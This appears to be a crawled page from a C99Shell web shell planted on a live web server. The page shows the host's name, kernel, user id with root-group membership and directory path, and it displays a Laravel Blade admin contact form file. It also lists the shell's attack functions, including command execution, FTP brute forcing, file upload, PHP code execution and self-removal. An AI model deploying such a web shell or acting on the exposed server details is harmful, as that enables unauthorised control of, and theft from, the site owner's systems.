!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio.picotech.app/public_html/resources/views/admin/contact/   drwxr-xr-x
Free 28.22 GB of 117.98 GB (23.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.blade.php (3.02 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="header_title">{{ trans('admin.header_title') }}</label>
    <input value="{{isset($contacts)?$contacts->header_title:old('header_title')}}" type="text" name="header_title" class="form-control" id="header_title"
           placeholder="{{ trans('admin.header_title') }}">
</div>
<div class="form-group">
    <label for="short_description">{{ trans('admin.short_description') }}</label>
    <textarea name="short_description" id="short_description" placeholder="{{ trans('admin.short_description') }}" class="form-control data">{{isset($contacts)?$contacts->short_description:''}}</textarea>
</div>
<div class="form-group">
    <label for="title">{{ trans('admin.title') }}</label>
    <input value="{{isset($contacts)?$contacts->title:old('title')}}" type="text" name="title" class="form-control" id="title"
           placeholder="{{ trans('admin.title') }}">
</div>
<div class="form-group">
    <label for="description">{{ trans('admin.description') }}</label>
    <textarea name="description" id="description" placeholder="{{ trans('admin.description') }}" class="form-control">{{isset($contacts)?$contacts->description:''}}</textarea>
</div>
<div class="form-group">
    <div class="d-flex align-tiem-center justify-content-between">
    <label for="features">Add Features</label>
    <a class="add-features add-btn btn btn-sm btn-primary" id="add-features"><i class="fa fa-plus" aria-hidden="true"></i></a>
</div>
    <div id="features-container">
        @if(isset($contacts)?$contacts->features:old('features'))
        @php
        $features = json_decode($contacts->features);
        @endphp
        @foreach($features as $feature)
        <div class="feature-input mt-3">
            <div class="row">
                <div class="col-lg-11">
                    <div class="form-group">
                        <input value="{{ $feature->features_title }}" type="text" name="features_title[]" class="form-control" placeholder="{{ trans('admin.title') }}" required>
                        </div>
                        <div class="form-group">
                        <textarea name="features_data[]" id="features" placeholder="{{ trans('admin.description') }}" class="form-control mt-3 data">{{ $feature->features_data }}</textarea>
                        </div>
                </div>
                <div class="col-lg-1">
                    <button class="delete-feature btn btn-sm add-btn btn-danger"><i class="fa fa-times"></i></button>
                </div>
            </div>
        </div>
        @endforeach
        @endif
    </div>
</div>
<div class="form-group">
    <label for="status">{{ trans('admin.status') }}</label>
    <select class="form-control" name="status" id="status" value="{{isset($contacts)?$contacts->status:''}}">
        <option {{isset($contacts) && $contacts->status=='active'?'selected':''}} value="active">{{ trans('admin.active') }}</option>
        <option {{isset($contacts) && $contacts->status=='inactive'?'selected':''}} value="inactive">{{ trans('admin.inactive') }}</option>
    </select>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--